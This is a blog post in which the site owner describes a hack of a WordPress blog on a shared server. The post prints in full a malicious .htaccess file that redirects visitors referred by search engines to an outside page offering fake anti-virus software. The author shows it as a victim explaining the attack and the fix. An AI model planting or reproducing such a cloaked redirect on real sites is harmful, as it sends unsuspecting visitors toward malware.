So I discovered today that my blog had been hacked – a word that governs a multitude of sins.
This hack seemed very clever:
- If you typed a URL in directly, as I would to get to my own site, the site worked as normal.
- If you visited the site from Google (or another search engine), you got redirected to another site, below, that tried to persuade you to download some supposed anti-virus software (which I’m sure was no such thing). I had no idea this was going on, as everything looked fine to me.
Not my site …
It turns out that someone had edited the htaccess file (a sort of configuration file for directories on your server) and made it look like this:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule .* http://justrags.com/Swatches/1106/jpg.php [R,L]
So whenever anyone visited my site from one of those search engines, the server automatically redirected it to the justrags.com site – which has a file on it called jpg.php it (not an image, but a file made to look like one to fool the site owner).
This, in turn, redirects you to thebestantispywarei.com (don’t go there). That site tries to get you to install some alleged anti-virus software, which you definitely shouldn’t.
It then turned out that my not-yet-finished company site had the same issue.
At first I thought that someone must have managed to get hold of all my passwords (the login details for the two sites are different – so one login can’t access both).
But then I checked out some other sites on my shared server such as:
- www.christchurchsouthcambs.org,
- gingerbeer.co.uk,
- possoft.co.uk and
- bloomsburycleaning.co.uk.
They all had (have as I write this) the same issue – visits via google were redirected, but you could get to the site by typing the URL directly.
My webhost hasn’t given me a very good explanation of what has happened or what’s going to stop it happening again – clearly the whole server has been compromised.
But, for now, I’ve recreated a normal htaccess file for a wordpress blog – cobbling one together out of this and this. And the site is back working as normal – with new passwords for the server.
You might also like
- Jan Moir and the PCC: why its website crashed
- Immigration Advisory Service hacked
- Cash Gordon: Do people REALLY not know the dangers of unfiltered twitter streams?
- Open Graph: let people FaceBook “like” your WordPress (or other) website
- ABCe: please sort out your terrible website (again)
Leave a comment!